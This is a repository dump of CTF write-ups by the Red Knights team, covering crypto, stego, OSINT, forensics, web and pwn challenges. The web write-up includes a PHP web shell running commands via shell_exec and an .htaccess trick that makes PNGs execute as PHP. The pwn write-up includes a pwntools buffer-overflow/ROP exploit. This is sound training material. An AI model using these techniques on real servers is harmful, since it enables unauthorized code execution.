https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/comment.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/decode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/decode.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/flag.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/morse.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/morse.wav


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/README.md:
--------------------------------------------------------------------------------
 1 | # Try try but don't cry
 2 | **category: cryptography**  
 3 | **points: 449**
 4 | 
 5 | ## Description
 6 | So many b64 and hex encodings.  
 7 | We are given a [cipher text](./chall.txt) and the [python script](./chall.py) used to make it.
 8 | 
 9 | ## Solution
10 | After reading the script, it looks like the flag is split into halves, then the characters from each half is xored with each other.
11 | Then it is encoded in hex, and the loop at the end randomnly encodes the flag with hex and base64. I used [Cyberchef](https://gchq.github.io/CyberChef/) to manually decode until I reach the last hex-encoded string.
12 | 
13 | ![final hex](./cyberchef.png)
14 | 
15 | Since we know the flag is in b00t2root{.\*} format, we can manually decode the xor. The original flag is split into 2 parts:  
16 | - b00t2root{_
17 | - __________}
18 | And the output is 035e44154106060c17181b.  
19 | 
20 | We can xor the known characters with the hex string, and get the rest of the flag.
21 | - 'b' ^ 03 = 'a'
22 | - '0' ^ 5e = 'n'
23 | - '0' ^ 44 = 't'
24 | - 't' ^ 15 = 'a'
25 | - '2' ^ 41 = 's'
26 | - 'r' ^ 06 = 't'
27 | - 'o' ^ 06 = 'i'
28 | - 'o' ^ 0c = 'c'
29 | - 't' ^ 17 = 'c'
30 | - '{' ^ 18 = 'c'
31 | - '}' ^ 1b = 'f'
32 | 
33 | **FLAG:** `b00t2root{fantasticc}`
34 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/chall.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | def xor(a,b):
 3 | 	l=""
 4 | 	for i in range(min(len(a), len(b))):
 5 | 		l+=chr(ord(a[i]) ^ ord(b[i]))
 6 | 	return l
 7 | 
 8 | def encrypt(flag):
 9 | 	l=random.randrange(2)
10 | 	if(l==0):
11 | 		return flag.encode('base64')
12 | 	elif(l==1):
13 | 		return flag.encode('hex')
14 | 	
15 | 
16 | flag="################"
17 | assert(len(flag)==22)
18 | c=xor(flag[:11], flag[11:])
19 | c=c.encode('hex')
20 | 
21 | n=random.randint(1,20)
22 | #print(n)
23 | 
24 | for _ in range(n):
25 | 	c=encrypt(c)
26 | 
27 | f=open('chall.txt', 'w')
28 | f.write(c)
29 | f.close()
30 | 
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Try try but don't cry/cyberchef.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ![](https://i.imgur.com/nEQGpLG.png)
 3 | # Upload(web)
 4 | 
 5 | url : http://198.211.100.125:8080/upload.php
 6 | 
 7 | After every hit-end trial method of uploading php code with different extensions. file Upload successfully with different php extensions (`php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc`) but code not work.
 8 | 
 9 | 
10 | may be it is due to the **.htaccess protection**.
11 | 
12 | and this **upload.php** file always **overwrite** the existing file during uploading in directory.
13 | 
14 | so i decided to change the content **under .htaccess**.
15 | 
16 | than i make a **.htaccess** file with configuration.
17 |     
18 |     ```AddType application/x-httpd-php .png```
19 |     
20 | The above configuration would instruct the Apache HTTP Server to execute PNG images as though they were PHP scripts
21 | 
22 | **.htaccess** uploading success(hurray .htaccess file overwrited with our conf)![](https://i.imgur.com/uMZ2t4N.png)
23 | ![](https://i.imgur.com/d7Xb2qq.png)
24 | 
25 | 
26 | ----
27 | lets upload the php code with .png extension and donot forgot to change content-type in burpsuite while uploading
28 |  
29 | 
30 | ```Content-Type: application/x-httpd-php```
31 | 
32 | 
33 | ![](https://i.imgur.com/O8qUA5D.png)
34 | ![](https://i.imgur.com/YCCEPmJ.png)
35 | ![](https://i.imgur.com/gXWMuCT.png)
36 | 
37 | # flag : b00t2root{remote_code_execution_vulnerability} 
38 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/Ryn0.png:
--------------------------------------------------------------------------------
1 | <?php
2 | $p = $_GET["p"];
3 | $o= shell_exec($p);
4 | echo $o;
5 | ?>


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/flag.txt:
--------------------------------------------------------------------------------
1 | b00t2root{remote_code_execution_vulnerability}
2 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/htaccess:
--------------------------------------------------------------------------------
1 | AddType application/x-httpd-php .png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Welcome To Pwn/README.md:
--------------------------------------------------------------------------------
 1 | # Welcome To Pwn
 2 | 
 3 | **Category**: Pwn \
 4 | **Points**: 457
 5 | **Solves**: 34
 6 | **Author**: Viper_S
 7 | 
 8 | ## Description
 9 | 
10 | > Welcome to pwn, here is an easy challenge to get you started.
11 | 
12 | > nc 35.238.225.156 1001
13 | 
14 | ## Solution
15 | 
16 | Just overwrite the return address with a ROP Chain of ret gadget and the get_shell function
17 | 
18 | ```python
19 | #!/usr/bin/env python3
20 | import sys
21 | from pwn import *
22 | 
23 | elf = ELF('./welcome')
24 | context.binary = elf
25 | if len(sys.argv) > 1:
26 | 	p = remote('35.238.225.156',1001)
27 | else:
28 | 	p = process(elf.path)
29 | 
30 | 
31 | get_shell = 0x0401182
32 | ret = 0x00401140
33 | 
34 | payload = b"A"*152+p64(ret)+p64(get_shell)
35 | p.sendlineafter("got",payload)
36 | p.interactive()
37 | ```
38 | 
39 | **Flag : b00t2root{W3lc0m3_T0_Pwn_YjAwdDJyb290JzIw}**
40 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/boot2root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/boot2root.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/rasput1n's string/README.md:
--------------------------------------------------------------------------------
 1 | # rasput1n's string
 2 | **category: programming**  
 3 | **points: 446**
 4 | 
 5 | ## Description
 6 | Given an encrypted message, rasput1n encodes it the following way:
 7 | 
 8 | Removes the median letter of the word from the original word and appends it to the end of the encrypted word and repeats the process until there are no letters left.
 9 | 
10 | A median letter in a word is the letter present in the middle of the word and if the word length is even, the median letter is the left one out of the two middle letters.
11 | 
12 | Can you decode the string?
13 | 
14 | ## Solution
15 | The mechanism of the encoding is already given in the question. We just need to reverse that.
16 | Here's a python script to do that.
17 | 
18 | ```python
19 | import re
20 | 
21 | with open('file', 'r') as f:
22 |     str1 = f.read()
23 | 
24 | n = len(str1)
25 | me = (n + 1) // 2
26 | 
27 | result = [''] * n
28 | result[me - 1] = str1[0]
29 | str1 = str1[1:]
30 | 
31 | j = me - 2
32 | for i in range(0, n - 1, 2):
33 |     result[j] = str1[i]
34 |     j -= 1
35 |     
36 | j = me
37 | for i in range(1, n - 1, 2):
38 |     result[j] = str1[i]
39 |     j += 1
40 | 
41 | str2 = ''.join(result)
42 | flag = re.findall('b00t2root{.*}', str2)[0]
43 | print(flag)
44 | ```
45 | 
46 | **FLAG:** `b00t2root{@The_Director_is_the_bot}`
47 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/rasput1n's string/getflag.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | 
 3 | with open('file', 'r') as f:
 4 |     str1 = f.read()
 5 | 
 6 | n = len(str1)
 7 | me = (n + 1) // 2
 8 | 
 9 | result = [''] * n
10 | result[me - 1] = str1[0]
11 | str1 = str1[1:]
12 | 
13 | j = me - 2
14 | for i in range(0, n - 1, 2):
15 |     result[j] = str1[i]
16 |     j -= 1
17 |     
18 | j = me
19 | for i in range(1, n - 1, 2):
20 |     result[j] = str1[i]
21 |     j += 1
22 | 
23 | str2 = ''.join(result)
24 | flag = re.findall('b00t2root{.*}', str2)[0]
25 | print(flag)
26 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_1.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_2.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_1.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_2.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # InterIUT CTF 2020
 3 | 
 4 | **Site**: https://ctf.hack2g2.fr/
 5 | 
 6 | **Rank**: 5 / 87
 7 | 
 8 | ![graph](graph.png)
 9 | ![rank](rank.png)
10 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/README.md:
--------------------------------------------------------------------------------
 1 | # Cature The Flag
 2 | 
 3 | **Category**: Steganography \
 4 | **Points**: 10
 5 | 
 6 | ## Discription
 7 | 
 8 | - Left To Right
 9 | - Hex
10 | 
11 | ## Challenge
12 | 
13 | - Given PNG Image
14 | - Get flag
15 | 
16 | ## Solution
17 | 
18 | We were given a png image
19 | 
20 | ![](chall.png)
21 | 
22 | After reading the discription it was clear that solution is related to `Hex`, I though it would be changing the magic numbers of the image. But that was not the case.
23 | 
24 | So i researched a bit and got an idea, that it could be reading the hex value of colors, for that purpose i got a great website : `https://html-color-codes.info/colors-from-image/`
25 | 
26 | ![](website.png)
27 | 
28 | Decoding all colors hex value from left to right, First background colors then the symbols from left to right gives us
29 | 
30 | ```
31 | 433031
32 | 307235
33 | 5F4330
34 | 643335
35 | 5F4D34
36 | 4E5F21
37 | ```
38 | 
39 | lets convert it to `ASCII` with `Cyberchef`
40 | 
41 | ![](cyberchef.png)
42 | 
43 | FLAG : H2G2{C010r5_C0d35_M4N_!}
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/chall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/chall.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/cyberchef.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/website.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/README.md:
--------------------------------------------------------------------------------
 1 | # Data Recovery 1
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 50
 5 | 
 6 | ## Description
 7 | 
 8 | Find Email Of The RSSI Of Random Corp.
 9 | 
10 | ## Solution
11 | 
12 | We were provided with a post `RSSI` of a company `Random Corp.` 
13 | 
14 | As we all know the best place to look up for companies and thier employee is `Lindedin`. So i searched on linkedin `RSSI Random Corp.` and the first profile was for us
15 | 
16 | ![](linkedin.png)
17 | 
18 | Looked deep into her profile but there was no email mentioned in her profile. so i looked up for a website that can gather emails from a profile
19 | and `https://skrapp.io/app/email-finder` worked for me
20 | 
21 | ![](skrapp.png)
22 | 
23 | we got the email !!!
24 | 
25 | FLAG : `H2G2{giseleletrou@randomcorp.bzh}`
26 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/linkedin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/data_recovery_1/linkedin.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/skrapp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/data_recovery_1/skrapp.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/graph.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/graph.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/ping_pong/ping_pong.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/ping_pong/ping_pong.pcapng


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/rank.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you/hash:
--------------------------------------------------------------------------------
1 | 0a5a0a121c309891420d117b7efc169d78ec233351e2b86b9778df7af3bd8a5e82ab3d3715b7fa405cca193dc7c6e484acec3bdf343ea94667c6be451a508e9a
2 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you/hash-types.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you/hash-types.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/README.md:
--------------------------------------------------------------------------------
 1 | # We Will Rock You Again
 2 | 
 3 | **Category**: Hash Cracking \
 4 | **Points**: 50
 5 | 
 6 | ## Challenge
 7 | 
 8 | - Given Hash And Salt
 9 | - Crack The Hash
10 | 
11 | ## Solution
12 | 
13 | We were given a hash and salt : `d809ee9ad068d33b71f48ad7507970e1:RonaldMcDonald`
14 | 
15 | First of all i used Hash-Identifier to identify the hash type
16 | 
17 | ![](hash-identifier.png)
18 | 
19 | So we are given a `MD5` hash and thier are lots of website and tool that can be used to crack `MD5` hash with salt, but none of them worked.
20 | 
21 | Hash-Identifier also gives a possibility that it can be a `MD5(HMAC)`, so i looked hashcat for `MD5(HMAC)` 
22 | 
23 | ![](help.png)
24 | 
25 | Now its time to fire up hashcat with `-m 60` as mentioned in hashcat help with `Rockyou.txt` wordlist
26 | 
27 | ![](hashcatss.png)
28 | 
29 | And It worked!!!
30 | 
31 | ![](show.png)
32 | 
33 | FLAG : `H2G2{Jackdaniels}`
34 | 
35 | 


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/hash-identifier.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/hash-identifier.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/hashcatss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/hashcatss.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/help.png


--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/show.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/show.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Aether plane take off/aether_plane_take_off.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Aether plane take off/aether_plane_take_off.wav


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Aether plane take off/figidi-result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Aether plane take off/figidi-result.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Astatine/Base85CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Astatine/Base85CyberChef.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Astatine/README.md:
--------------------------------------------------------------------------------
 1 | # Astatine {10 points}🧪
 2 | 
 3 | ###### Challenge Description
 4 | 
 5 | Can you read the message?
 6 | 
 7 | 5t4=2<(;4P0Q^YXDIYA21Ltn
 8 | 
 9 | ###### Category : Steganography
10 | ###### Author : Jerin John Mathew (Shadow_Walker)
11 | ###### Team : Red Knights
12 | 
13 | ![](https://img.shields.io/badge/10-Steganography-red) ![](https://img.shields.io/badge/-Cryptography-green)
14 | 
15 | So this is a Steganography challenge in which we have a **crypted text : 5t4=2<(;4P0Q^YXDIYA21Ltn**
16 | 
17 | The Challenge title gives us the name... _Astatine_
18 | 
19 | So.... 
20 | time for a _chemistry class_ for CTF players... 🤣
21 | 
22 | _Astatine_ is basically one of the elements in the periodic table having an **atomic number 85**.
23 | It is the rarest naturally occurring element in the Earth's crust.
24 | 
25 | _End of Class_
26 | 
27 | This is the hint required "85" and you need to find the type of encryption methods with 85 in their name... 
28 | OR a guy having good cryptographic knowledge can understand that it is **BASE 85 Encryption**
29 | 
30 | Now you just needed to take the string and submit to **Cyberchef** with base 85 recipie foe decrypting....
31 | and VOILA...
32 | 
33 | ![](Base85CyberChef.png)
34 | 
35 | 
36 | # FLAG OBTAINED :-->  AFFCTF{n0t_3nc0d3d} ... 🚩
37 | 
38 | 
39 | For more information on base 85 :---> https://en.wikipedia.org/wiki/Ascii85
40 | 
41 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/README.md:
--------------------------------------------------------------------------------
 1 | # Black Dots
 2 | 
 3 | **Category**: Stego
 4 | **Points**: 10
 5 | 
 6 | ![](mg.png)
 7 | In the given picture. you'll see white & black pixels, after sometime I realized it's pointing to something
 8 | I wrote a small script that's convert the white pixel to 0 and the black to 1 , for convert the pixels into binary.
 9 | ```
10 | from PIL import Image, ImageDraw 
11 | image = Image.open("mg.png")
12 | draw = ImageDraw.Draw(image)
13 | width = image.size[0]
14 | height = image.size[1]
15 | str = ''
16 | pix = image.load()
17 | for x in range(height):
18 |     for y in range(width):
19 |         r = pix[y, x][0]
20 |         g = pix[y, x][1]
21 |         b = pix[y, x][2]
22 |         sr = (r + g + b)
23 |         if sr == 0:
24 |             str += '1'
25 |         else:
26 |             str += '0'
27 | print(str)
28 | ```
29 | And we got the binary , using any online converter we can convert the binary into text.
30 | ![](Script2.png)
31 | 
32 | 
33 | the flag is `AFFCTF{MonochromatiC ThinkinG}`
34 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/Script2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Black Dots/Script2.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/mg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Black Dots/mg.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/BreakMe/encrypted.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/BreakMe/encrypted.txt


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/BreakMe/public.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN PUBLIC KEY-----
2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAL5fZwx838wL00ES071xIp/T5EblMb81
3 | FgNsElgzb2xRAgMBAAE=
4 | -----END PUBLIC KEY-----
5 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/img.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/long-polls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/long-polls.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/pwn.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/pwn.gif


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/README.md:
--------------------------------------------------------------------------------
 1 | # Writeup: Char Wrap:triangular_flag_on_post:
 2 | 
 3 | ***Category : Forensic***:minidisc:\
 4 | ***Points : 10***\
 5 | ***Author : krn bhargav (Ryn0)*** \
 6 | ***Team : Red-Knights***:warning:
 7 | ## Description
 8 | >only [file](https://github.com/Red-Knights-CTF/writeups/raw/master/2020/affinity_ctf_lite/Char_Wrap/charwrap) given.
 9 |   
10 | ![charwrap](charwrap.png)
11 |   
12 | ## solution
13 | >This is only elf-64 file.
14 |   
15 | ![filedescription](file.png)
16 | 
17 | >use strings to get flag(flag format : AFFCTF{})
18 | 
19 | ![stringuse](stringsuse.png)
20 | 
21 | >then remove 'H', you got
22 | ```
23 | Flag : AFFCTF{you_found_somethiHng!}
24 | ```
25 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/charwrap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/charwrap


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/charwrap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/charwrap.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/file.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/stringsuse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/stringsuse.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/README.md:
--------------------------------------------------------------------------------
 1 | # Writeup: Classic Forensic:triangular_flag_on_post: 
 2 | 
 3 | ***Category : Forensic***:minidisc:\
 4 | ***Points : 425***\
 5 | ***Author : krn bhargav (Ryn0)*** \
 6 | ***Team : Red-Knights***:warning:
 7 | ## Description
 8 | >We need to do some classic forensic stuff on this mem dump, can you help us and check what is important there?
 9 | 
10 | [Dumpfile](https://2020.affinityctf.com/files/f8289d6b397154b768538dd9213d4589/mem.dmp.7z)-259 MB (sorry for not uploading.)
11 | 
12 | ![description](description.png)
13 |   
14 | ## solution
15 | >We have a MS Windows 64bit crash dump,for this we have to use the tool [Volatility3](https://github.com/volatilityfoundation/volatility3).
16 | >Thanks to the authors for making our life easy.
17 | 
18 | ![fileinfo](fileinfo.png)
19 | 
20 | >During this ctf,I try everything to analyse this MEMORY.dmp but donot find anything ,finally i use this command.
21 | 
22 | ```
23 | vol.py -f MEMORY.dmp windows.lsadump
24 | ```
25 | >in this command we used the lsadump plugin to extract lsa secrets.
26 | >and found flag
27 | ![volatility3](volatility.png)
28 | 
29 | ```
30 | Flag : AFFCTF{f0rensic_w3ll_d0n3}
31 | ```
32 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/description.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/fileinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/fileinfo.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/volatility.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/volatility.png


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/Fibonacci.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Fibonacci/Fibonacci.7z


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/main.py:
--------------------------------------------------------------------------------
 1 | def gen_fib(n):
 2 |     ans = [0, 1]
 3 |     while ans[-1] < n:
 4 |         ans.append(ans[-1] + ans[-2])
 5 |     return ans
 6 | 
 7 | 
 8 | i = 0
 9 | with open('out.7z', 'wb') as fout:
10 |     with open('Fibonacci.7z', 'rb') as fin:
11 |         fibs = gen_fib(1000)
12 |         fibs = set(fibs)
13 | 
14 |         while True:
15 |             b = fin.read(1)
16 |             if b == b'':
17 |                 break
18 | 
19 |             if i not in fibs:
20 |                 fout.write(b)
21 | 
22 |             i += 1
23 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/out.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Fibonacci/out.7z


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Hongqiao/README.md:
--------------------------------------------------------------------------------
 1 | # Hongqiao
 2 | 
 3 | **Category: Crypto** \
 4 | **Points: 10**
 5 | 
 6 | ## Desciption
 7 | 
 8 | The flag is AFFCTF{395f4dfc82f56b796b23c3fa1b5150cbe568d71e} but the content is encrypted! Can you discover the flag content?
 9 | 
10 | ## Challenge
11 | 
12 | - Given Hash
13 | - Find The Flag
14 | 
15 | ## Solution
16 | 
17 | We were given a `SHA-1` hash `395f4dfc82f56b796b23c3fa1b5150cbe568d71e` .I have used https://crackstation.net to crack the hash
18 | 
19 | ![](https://github.com/Red-Knights-CTF/writeups/blob/master/2020/affinity_ctf_lite/Hongqiao/crackstation.png)
20 | 
21 | FLAG - AFFCTF{Unimaginatively}
22 | 


--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Hongqiao/crackstation.png:
